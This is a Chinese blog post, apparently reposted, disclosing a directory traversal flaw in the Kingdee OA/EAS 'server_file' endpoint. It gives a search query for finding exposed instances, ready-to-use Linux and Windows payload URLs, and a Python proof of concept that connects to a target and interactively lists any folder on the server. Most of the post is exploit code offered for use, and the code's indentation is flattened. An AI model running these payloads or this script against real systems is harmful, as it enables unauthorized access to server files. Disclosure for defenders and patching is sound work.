暂无图片
暂无图片
暂无图片
暂无图片
暂无图片

金蝶OA server_file 目录遍历漏洞 附POC

Redus 2021-06-08
6994





漏洞描述

金蝶OA server_file 存在目录遍历漏洞,可目录遍历可以获取服务器敏感信息


神秘代码

    app="Kingdee-EAS"


    漏洞 Payload

      # linux 
      /appmonitor/protected/selector/server_file/files?folder=/&suffix=
      # windows
      /appmonitor/protected/selector/server_file/files?folder=C://&suffix=


      漏洞复现


      验证Poc

        import requests
        import json
        import optparse
        # app="Kingdee-EAS"




        parser = optparse.OptionParser()
        parser.add_option("-u","--url",dest="urls",action="store",help="Base target uri (ex. http://target-uri/)")
        options, args = parser.parse_args()
        url_Kingdee = options.urls




        def poc():
        check = requests.get(url_Kingdee).status_code
        if check ==200:
        flag = True
        print("[+] Success connect to target")
        try:
        headers = {
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'
        }
        while flag:
        cmd = input("$ ")
        if cmd == 'exit':
        exit()
        payload = '/appmonitor/protected/selector/server_file/files?folder='+cmd+'&suffix='
                    rep = requests.get(url_Kingdee+payload,headers=headers,verify=False)
        format = json.loads(rep.text)
        dict_json = format['rows']
        for t in dict_json:
        print(t['path'])
        except:
        exit()


        poc()


        验证 Poc 没有对服务器进行分辨 Windows 与 Linux,(主要有点懒),大佬们可以自行补充下缺省部分,写的太菜,轻喷。


        谢谢观看





          十载求学纵苦三伏三九无悔无怨,朝成就再忆全心全力有苦有乐

        ——致2021高考学子



        文章转载自Redus,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

        评论